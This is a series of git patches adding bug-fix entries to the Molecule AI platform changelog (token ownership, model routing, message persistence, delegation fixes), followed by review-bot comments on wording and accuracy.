(`molecule-ai-workspace-template-openclaw` [#16](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/16)) + +> **Note:** Yesterday's (2026-05-16) changelog entry covers Hermes workspace MCP server wiring, bearer-token 401 fixes, Claude Code template Kimi K2.6 routing, and the platform-side token-injection ownership fix โ€” see the [2026-05-16 section](#2026-05-16) below. + +--- + ## 2026-05-16 ### ๐Ÿ”ง Fixes -- 2.52.0 From ff1b3f6caf763f33955bf677e5ba6436a53d08bb Mon Sep 17 00:00:00 2001 From: Molecule AI App & Docs Lead Date: Sat, 16 May 2026 15:00:21 +0000 Subject: [PATCH 09/15] =?UTF-8?q?fix(changelog):=20remove=202026-05-16=20s?= =?UTF-8?q?ection=20=E2=80=94=20docs#51=20is=20canonical?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit docs#51 (which should merge first) adds the 2026-05-16 section. docs#52 now contains only the 2026-05-17 OpenClaw template fixes to avoid merge conflicts. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 15 --------------- 1 file changed, 15 deletions(-) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index fa57d7e..939d48c 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx 
@@ -20,21 +20,6 @@ Entries are published daily at 23:50 UTC. --- -## 2026-05-16 - -### ๐Ÿ”ง Fixes - -- **Hermes workspace MCP server tools now reach the agent loop**: the `molecule-ai/mcp-server` process was starting correctly on `127.0.0.1:9100` and the `/mcp` route was verified working (JSON-RPC `initialize` returned 12 tools), but the Hermes agent was not calling platform tools because `MOLECULE_MCP_SERVER_URL` was not wired into the Hermes `config.yaml`. The `start.sh` now sets `MOLECULE_MCP_SERVER_URL=http://localhost:9100` at startup, and the agent loop correctly connects. (`molecule-ai-workspace-template-hermes` [#22](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/22)) -- **Hermes workspace bearer token 401 on MCP tool calls fixed (two-part fix)**: a fresh Hermes workspace was returning HTTP 401 on every `list_peers` and A2A MCP tool call with the canned *"bearer token may be invalid"* message. Two independent root causes were identified and fixed: (1) workspace side โ€” `CONFIGS_DIR` was not set in the agent environment, so the molecule MCP server could not locate the token file at `/configs/.auth_token`. `start.sh` now sets `CONFIGS_DIR=/configs` and ensures the agent owns the `/configs` directory. (`molecule-ai-workspace-template-hermes` [#23](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/23)); (2) platform side โ€” two workspace-server token-injection paths were writing `/configs/.auth_token` and `/configs/.platform_inbound_secret` as `root:root` after the template entrypoint's `chown -R agent:agent /configs` had already run. Since the MCP server runs as agent uid 1000 (via `gosu agent`), `platform_auth.get_token()` hit `Permission denied` โ†’ empty bearer โ†’ 401. Both injection paths now stamp token files as uid/gid 1000 (agent) instead of root. 
(`molecule-core` [#1327](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1327)) -- **Claude Code template Kimi K2.6 model routed to official `api.kimi.com/coding` endpoint**: the Claude Code workspace template's adapter now correctly routes `Kimi K2.6` to the official Kimi coding endpoint (`api.kimi.com/coding`) instead of the default Anthropic-compatible endpoint, per Kimi's official API specification. (`molecule-ai-workspace-template-claude-code` [#24](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-claude-code/pulls/24)) - -### ๐Ÿงน Internal - -- **Platform Files API groundwork** (`molecule-core`): Phase 1โ€“3 of the Files API roots RFC (`internal#425`) landed across four PRs โ€” the `secrets` package now has a canonical credential-shape regex SSOT (`#1255`); the FilesTab canvas component gains an `/agent-home` root option and a secret-shape denial placeholder (`#1257`); the API gains a stub `allowedRoots` key with a 501 short-circuit (`#1247`); and the handler test suite was hardened to prevent data races during `db.DB` swap (`#1267`). These are infrastructure PRs that enable future per-container home directory isolation โ€” the `/agent-home` root will be documented when the API ships. -- **Scripts CI improvements** (`internal`): SOP tier-check now tolerates empty/invalid tokens while the token is being provisioned (`internal#431`); the `continue-on-error` guard on the PR-body gate is disabled when the runner backlog is draining to avoid silent pass (`internal#437`). - ---- - ## 2026-05-12 ### ๐Ÿ”’ Security -- 2.52.0 From 521d221597eefcf1d77c42e5f499d334b0ad9265 Mon Sep 17 00:00:00 2001 
From: Molecule AI Documentation Specialist Date: Sat, 16 May 2026 16:17:53 +0000 Subject: [PATCH 10/15] docs(changelog): add molecule-core#1350 poll-mode message persistence fix MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Adds the poll-mode canvas user-message data-loss fix to the 2026-05-17 section. logA2AReceiveQueued only wrote to the in-memory queue, not durable storage — the persist call now runs before the poll-mode short-circuit. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 939d48c..bfe45b1 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx 
@@ -15,8 +15,7 @@ Entries are published daily at 23:50 UTC. - **OpenClaw template adapter routing: fresh provisions now serve correctly**: OpenClaw workspace provisions were failing immediately after launch โ€” the adapter had no routing path for the default model, causing every new workspace to be non-functional on first boot. The adapter now coerces an unroutable model to a known-good default, ensuring new OpenClaw workspaces are immediately usable without manual configuration. (`molecule-ai-workspace-template-openclaw` [#18](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/18)) - **OpenClaw template MiniMax and Kimi-For-Coding API keys routed to correct endpoints**: the OpenClaw adapter was routing all Minimax (`sk-cp-*` keys) and Kimi-For-Coding (`sk-kimi-*` keys) API calls to the wrong endpoints, causing HTTP 401 errors on every chat turn. Minimax calls now route to the Anthropic-compatible gateway; Kimi-For-Coding calls route via Moonshot's Anthropic-compat endpoint, mirroring the existing MiniMax fix. (`molecule-ai-workspace-template-openclaw` [#14](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/14), [#17](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/17)) - **OpenClaw template now shows molecule platform peers**: OpenClaw workspaces were not returning molecule platform peers in `list_peers` responses โ€” the model was answering via its own native `sessions_list` instead of querying the molecule A2A registry. The adapter now correctly registers the molecule A2A MCP server, so `list_peers` returns platform peers as expected. 
(`molecule-ai-workspace-template-openclaw` [#16](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/16)) - -> **Note:** Yesterday's (2026-05-16) changelog entry covers Hermes workspace MCP server wiring, bearer-token 401 fixes, Claude Code template Kimi K2.6 routing, and the platform-side token-injection ownership fix โ€” see the [2026-05-16 section](#2026-05-16) below. +- **Poll-mode canvas user messages now persist correctly before returning 200**: canvas chat messages sent via workspaces running in poll mode (`runtime=external`) were occasionally lost when the user exited the chat before the agent processed the message. The root cause was a previous assertion that poll-mode workspaces were unaffected by message-persistence issues โ€” in fact, `logA2AReceiveQueued` (which was assumed to persist at ingest) only wrote to the in-memory queue, not to durable storage. The persist call is now correctly placed before the poll-mode short-circuit, ensuring messages are durable before the canvas receives a `200`. (`molecule-core` [#1350](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1350)) --- -- 2.52.0 From 8c337434302c29cc897082e577708c6a0bba0691 Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sat, 16 May 2026 22:16:14 +0000 Subject: [PATCH 11/15] docs(changelog): add molecule-core#1348 inbox poller self-echo loop fix Adds the self-delegation-echo fix to the 2026-05-17 section. _is_self_echo_row() predicate now skips a2a_receive rows where source_id == workspace_id, breaking the infinite inbox self-echo loop. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index bfe45b1..852d660 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx 
@@ -16,6 +16,7 @@ Entries are published daily at 23:50 UTC. - **OpenClaw template MiniMax and Kimi-For-Coding API keys routed to correct endpoints**: the OpenClaw adapter was routing all Minimax (`sk-cp-*` keys) and Kimi-For-Coding (`sk-kimi-*` keys) API calls to the wrong endpoints, causing HTTP 401 errors on every chat turn. Minimax calls now route to the Anthropic-compatible gateway; Kimi-For-Coding calls route via Moonshot's Anthropic-compat endpoint, mirroring the existing MiniMax fix. (`molecule-ai-workspace-template-openclaw` [#14](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/14), [#17](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/17)) - **OpenClaw template now shows molecule platform peers**: OpenClaw workspaces were not returning molecule platform peers in `list_peers` responses โ€” the model was answering via its own native `sessions_list` instead of querying the molecule A2A registry. The adapter now correctly registers the molecule A2A MCP server, so `list_peers` returns platform peers as expected. (`molecule-ai-workspace-template-openclaw` [#16](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/16)) - **Poll-mode canvas user messages now persist correctly before returning 200**: canvas chat messages sent via workspaces running in poll mode (`runtime=external`) were occasionally lost when the user exited the chat before the agent processed the message. The root cause was a previous assertion that poll-mode workspaces were unaffected by message-persistence issues โ€” in fact, `logA2AReceiveQueued` (which was assumed to persist at ingest) only wrote to the in-memory queue, not to durable storage. The persist call is now correctly placed before the poll-mode short-circuit, ensuring messages are durable before the canvas receives a `200`. 
(`molecule-core` [#1350](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1350)) +- **Inbox poller self-echo loop fixed**: when a workspace delegates a task to a target that never picks it up, the platform's `report_activity("a2a_receive")` call records the activity with the sender's workspace UUID as `source_id` (per spoof-defense design). The sender's inbox poller was incorrectly processing this as an incoming message from itself โ€” causing an infinite self-echo loop that flooded the inbox. A new `_is_self_echo_row()` predicate now skips `a2a_receive` rows where `source_id == workspace_id`, breaking the loop. (`molecule-core` [#1348](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1348)) --- -- 2.52.0 From a42b038c02ef7b5bb80d98b4b68c17e25ea06325 Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sun, 17 May 2026 02:17:33 +0000 Subject: [PATCH 12/15] docs(changelog): add hermes#24, openclaw#19, openclaw#20 to 2026-05-17 - hermes#24: runtime now runs as agent uid 1000 (fixes list_peers 401) - openclaw#19: T4 host-root escalation leg + list_peers token-ownership fix - openclaw#20: default model coercion requires keyed (not just routable) target Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 3 +++ 1 file changed, 3 insertions(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 852d660..6b7af27 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx 
@@ -17,6 +17,9 @@ Entries are published daily at 23:50 UTC. - **OpenClaw template now shows molecule platform peers**: OpenClaw workspaces were not returning molecule platform peers in `list_peers` responses โ€” the model was answering via its own native `sessions_list` instead of querying the molecule A2A registry. The adapter now correctly registers the molecule A2A MCP server, so `list_peers` returns platform peers as expected. (`molecule-ai-workspace-template-openclaw` [#16](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/16)) - **Poll-mode canvas user messages now persist correctly before returning 200**: canvas chat messages sent via workspaces running in poll mode (`runtime=external`) were occasionally lost when the user exited the chat before the agent processed the message. The root cause was a previous assertion that poll-mode workspaces were unaffected by message-persistence issues โ€” in fact, `logA2AReceiveQueued` (which was assumed to persist at ingest) only wrote to the in-memory queue, not to durable storage. The persist call is now correctly placed before the poll-mode short-circuit, ensuring messages are durable before the canvas receives a `200`. (`molecule-core` [#1350](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1350)) - **Inbox poller self-echo loop fixed**: when a workspace delegates a task to a target that never picks it up, the platform's `report_activity("a2a_receive")` call records the activity with the sender's workspace UUID as `source_id` (per spoof-defense design). The sender's inbox poller was incorrectly processing this as an incoming message from itself โ€” causing an infinite self-echo loop that flooded the inbox. A new `_is_self_echo_row()` predicate now skips `a2a_receive` rows where `source_id == workspace_id`, breaking the loop. 
(`molecule-core` [#1348](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1348)) +- **Hermes workspace runtime now runs as agent uid 1000, not root**: production Hermes workspaces were returning HTTP 401 on `list_peers` because the runtime was running as root. The `start.sh` now runs `molecule-runtime` as agent uid 1000 (via `gosu agent`), preserving the uid-1000 + `/configs/.auth_token` contract that the platform expects. Previously the runtime was accidentally running as root inside the container, breaking token-based auth. (`molecule-ai-workspace-template-hermes` [#24](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/24)) +- **OpenClaw T4 host-root escalation leg added**: OpenClaw now gains full parity with the Claude Code template on T4 tier โ€” an additive uid-0 escalation leg provides a wired path to host root inside the privileged container sandbox while preserving the uid-1000 agent identity and the agent-owned `/configs/.auth_token` contract. Also atomically fixes `list_peers` by ensuring the runtime runs as agent uid 1000 (previously ran as root). (`molecule-ai-workspace-template-openclaw` [#19](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/19)) +- **OpenClaw template default model coercion now uses a keyed target**: the OpenClaw adapter's model coercion was finding a routable model but not a keyed one, causing the coercion to fail silently and leave the adapter in a non-functional state. The coercion target must now be both routable AND keyed in the registry. (`molecule-ai-workspace-template-openclaw` [#20](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/20)) --- -- 2.52.0 From 056c54a30063fee906faca6658ff85b7796e2289 Mon Sep 17 00:00:00 2001 
From: Molecule AI Documentation Specialist Date: Sun, 17 May 2026 04:16:59 +0000 Subject: [PATCH 13/15] docs(changelog): add hermes#26 T4 escalation leg + real CI conformance gate Closes the gap between hermes#24 (uid-1000 fix) and hermes#26 which adds the T4 host-root escalation leg AND a real boot-path assertion in the CI t4-conformance gate (previously a tautology). Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 6b7af27..df97da8 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx 
@@ -18,6 +18,7 @@ Entries are published daily at 23:50 UTC. - **Poll-mode canvas user messages now persist correctly before returning 200**: canvas chat messages sent via workspaces running in poll mode (`runtime=external`) were occasionally lost when the user exited the chat before the agent processed the message. The root cause was a previous assertion that poll-mode workspaces were unaffected by message-persistence issues โ€” in fact, `logA2AReceiveQueued` (which was assumed to persist at ingest) only wrote to the in-memory queue, not to durable storage. The persist call is now correctly placed before the poll-mode short-circuit, ensuring messages are durable before the canvas receives a `200`. (`molecule-core` [#1350](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1350)) - **Inbox poller self-echo loop fixed**: when a workspace delegates a task to a target that never picks it up, the platform's `report_activity("a2a_receive")` call records the activity with the sender's workspace UUID as `source_id` (per spoof-defense design). The sender's inbox poller was incorrectly processing this as an incoming message from itself โ€” causing an infinite self-echo loop that flooded the inbox. A new `_is_self_echo_row()` predicate now skips `a2a_receive` rows where `source_id == workspace_id`, breaking the loop. (`molecule-core` [#1348](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1348)) - **Hermes workspace runtime now runs as agent uid 1000, not root**: production Hermes workspaces were returning HTTP 401 on `list_peers` because the runtime was running as root. The `start.sh` now runs `molecule-runtime` as agent uid 1000 (via `gosu agent`), preserving the uid-1000 + `/configs/.auth_token` contract that the platform expects. Previously the runtime was accidentally running as root inside the container, breaking token-based auth. 
(`molecule-ai-workspace-template-hermes` [#24](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/24)) +- **Hermes workspace T4 host-root escalation leg added**: Hermes now gains full parity with the Claude Code template on T4 tier โ€” an additive uid-0 escalation leg provides a wired path to host root inside the privileged container sandbox (`sudo` + `nsenter` + `docker` group membership) while preserving the uid-1000 agent identity and the agent-owned `/configs/.auth_token` contract. The CI `t4-conformance` gate was also hardened: previously it asserted token-file ownership by creating the file itself (a tautology), so it stayed green even if `exec gosu agent` regressed. It now probes the real boot-path exec of `start.sh` under `MOLECULE_SMOKE_MODE=1` to verify that `molecule-runtime` genuinely runs as uid 1000 โ€” fail-closed on regression. (`molecule-ai-workspace-template-hermes` [#26](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/26)) - **OpenClaw T4 host-root escalation leg added**: OpenClaw now gains full parity with the Claude Code template on T4 tier โ€” an additive uid-0 escalation leg provides a wired path to host root inside the privileged container sandbox while preserving the uid-1000 agent identity and the agent-owned `/configs/.auth_token` contract. Also atomically fixes `list_peers` by ensuring the runtime runs as agent uid 1000 (previously ran as root). (`molecule-ai-workspace-template-openclaw` [#19](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/19)) - **OpenClaw template default model coercion now uses a keyed target**: the OpenClaw adapter's model coercion was finding a routable model but not a keyed one, causing the coercion to fail silently and leave the adapter in a non-functional state. The coercion target must now be both routable AND keyed in the registry. 
(`molecule-ai-workspace-template-openclaw` [#20](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/20)) -- 2.52.0 From 99de0f0c2f6b3683883ab7da04ee412425e67518 Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sun, 17 May 2026 14:16:58 +0000 Subject: [PATCH 14/15] docs(changelog): add molecule-core#1415 Workspace Tokens tab 500 fix MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Settings → Workspace Tokens crashed with HTTP 500 when no canvas node was selected. The canvas passed "global" as a UUID column value → Postgres invalid input syntax → 500. Token handlers now handle the sentinel. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index df97da8..cb7c896 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx 
@@ -21,6 +21,7 @@ Entries are published daily at 23:50 UTC. - **Hermes workspace T4 host-root escalation leg added**: Hermes now gains full parity with the Claude Code template on T4 tier โ€” an additive uid-0 escalation leg provides a wired path to host root inside the privileged container sandbox (`sudo` + `nsenter` + `docker` group membership) while preserving the uid-1000 agent identity and the agent-owned `/configs/.auth_token` contract. The CI `t4-conformance` gate was also hardened: previously it asserted token-file ownership by creating the file itself (a tautology), so it stayed green even if `exec gosu agent` regressed. It now probes the real boot-path exec of `start.sh` under `MOLECULE_SMOKE_MODE=1` to verify that `molecule-runtime` genuinely runs as uid 1000 โ€” fail-closed on regression. (`molecule-ai-workspace-template-hermes` [#26](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/26)) - **OpenClaw T4 host-root escalation leg added**: OpenClaw now gains full parity with the Claude Code template on T4 tier โ€” an additive uid-0 escalation leg provides a wired path to host root inside the privileged container sandbox while preserving the uid-1000 agent identity and the agent-owned `/configs/.auth_token` contract. Also atomically fixes `list_peers` by ensuring the runtime runs as agent uid 1000 (previously ran as root). (`molecule-ai-workspace-template-openclaw` [#19](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/19)) - **OpenClaw template default model coercion now uses a keyed target**: the OpenClaw adapter's model coercion was finding a routable model but not a keyed one, causing the coercion to fail silently and leave the adapter in a non-functional state. The coercion target must now be both routable AND keyed in the registry. 
(`molecule-ai-workspace-template-openclaw` [#20](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/20)) +- **Workspace Tokens tab no longer crashes with HTTP 500 when no node is selected**: Settings โ†’ Workspace Tokens was returning `500` on both GET (list tokens) and POST (create token) whenever the canvas had no node selected. The canvas was passing the literal sentinel `"global"` as the workspace ID in that state, which the backend interpreted as a UUID column value โ€” Postgres threw `invalid input syntax for type uuid: "global"` โ†’ 500. The token handlers now correctly handle the `"global"` sentinel, returning an empty token list for GET and prompting the user to select a workspace for POST. (`molecule-core` [#1415](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1415)) --- -- 2.52.0 From 9cb33c676ba0e21d593bd0b5427eb2326b0c64d3 Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sun, 17 May 2026 23:55:20 +0000 Subject: [PATCH 15/15] docs(changelog): add molecule-core#1446 P0 ctx-detachment delegation fix Delivery-mode lookup was silently falling back to push on context errors, causing poll-mode workspaces to never receive a2a_receive inbox rows. lookupDeliveryMode now propagates context errors explicitly; the proxy fails the delegation HTTP 503 (retryable) instead of silently misrouting. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index cb7c896..3e562c7 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx 
@@ -22,6 +22,7 @@ Entries are published daily at 23:50 UTC. - **OpenClaw T4 host-root escalation leg added**: OpenClaw now gains full parity with the Claude Code template on T4 tier โ€” an additive uid-0 escalation leg provides a wired path to host root inside the privileged container sandbox while preserving the uid-1000 agent identity and the agent-owned `/configs/.auth_token` contract. Also atomically fixes `list_peers` by ensuring the runtime runs as agent uid 1000 (previously ran as root). (`molecule-ai-workspace-template-openclaw` [#19](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/19)) - **OpenClaw template default model coercion now uses a keyed target**: the OpenClaw adapter's model coercion was finding a routable model but not a keyed one, causing the coercion to fail silently and leave the adapter in a non-functional state. The coercion target must now be both routable AND keyed in the registry. (`molecule-ai-workspace-template-openclaw` [#20](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/20)) - **Workspace Tokens tab no longer crashes with HTTP 500 when no node is selected**: Settings โ†’ Workspace Tokens was returning `500` on both GET (list tokens) and POST (create token) whenever the canvas had no node selected. The canvas was passing the literal sentinel `"global"` as the workspace ID in that state, which the backend interpreted as a UUID column value โ€” Postgres threw `invalid input syntax for type uuid: "global"` โ†’ 500. The token handlers now correctly handle the `"global"` sentinel, returning an empty token list for GET and prompting the user to select a workspace for POST. (`molecule-core` [#1415](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1415)) +- **A2A delegation now fails closed on delivery-mode lookup errors instead of silently misrouting**: when a workspace-to-workspace `delegate_task` request arrived with a cancelled request context (e.g. 
the HTTP connection timed out before the delegation goroutine acquired its own context), `lookupDeliveryMode` returned a context error, which the proxy was silently converting to a `DeliveryModePush` fallback. This caused the poll-mode short-circuit to be skipped โ€” poll-mode workspaces would never receive the `a2a_receive` inbox row, silently losing the delegation. `lookupDeliveryMode` now propagates context errors explicitly; the proxy fails the delegation with HTTP 503 (marking it retryable) instead of silently misrouting it. Other database errors retain the existing fail-open-to-push behavior. (`molecule-core` [#1446](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1446)) --- -- 2.52.0
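
Review bot: PATCH 09/15 deletes the `## 2026-05-16` section but keeps the Note added by the preceding patch, whose link `[2026-05-16 section](#2026-05-16)` then points at an anchor that does not exist in this file until docs#51 merges. The Note is only deleted in PATCH 10/15, so move that deletion into this commit so that every commit in the series renders without a dead in-page link.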
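
Review bot: in the poll-mode entry added by PATCH 10/15, "The root cause was a previous assertion that poll-mode workspaces were unaffected" names a belief rather than the defect. The cause given later in the same sentence is that `logA2AReceiveQueued` wrote only to the in-memory queue, so lead with that. The commit message should also mention that this commit deletes the 2026-05-16 Note, since the diffstat shows 2 deletions that the message does not account for.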
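
Review bot: the Hermes entry added by PATCH 12/15 attributes the `list_peers` 401 to the runtime running as root but never says why a root runtime fails token auth, and it states the root condition twice (second and last sentence). The 2026-05-16 text removed in PATCH 09/15 explained the earlier 401 as `Permission denied` for uid 1000 on `root:root` token files, which is a different failure, so name the mechanism for this one and drop the duplicate sentence. The OpenClaw #19 entry also bundles a host-root escalation leg with a `list_peers` auth fix; split them so a reader auditing privilege changes can find the escalation leg on its own line.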
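
Review bot: the Hermes T4 entry added by PATCH 13/15 lists `sudo` + `nsenter` + `docker` group membership as the path to host root, yet it sits in the same list as routine bug fixes and does not say how the leg is limited to T4 workspaces. `docker` group membership on its own is root-equivalent on the host, so state the gating condition and consider moving both T4 entries under the Security heading this changelog already uses for 2026-05-12. The OpenClaw #19 entry names no mechanism at all; bring the two entries to the same level of detail.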
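
Review bot: the Workspace Tokens entry added by PATCH 14/15 describes handling for the single literal `"global"`, which leaves open whether any other non-UUID workspace ID still reaches Postgres and produces the same `invalid input syntax for type uuid` 500. If the handlers validate the ID as a UUID before querying, say so; if they only special-case the sentinel, record that as a known gap. "prompting the user to select a workspace for POST" should also give the status code now returned, as the entry does for the old 500.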
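
Review bot: the headline of the entry added by PATCH 15/15 says delegation "fails closed on delivery-mode lookup errors", but its last sentence says other database errors keep the fail-open-to-push behavior, so only context errors fail closed. Narrow the headline to context errors. Since the commit subject labels this P0, the entry should also say whether the remaining fail-open path can still skip the poll-mode short-circuit and lose the `a2a_receive` inbox row in the same way.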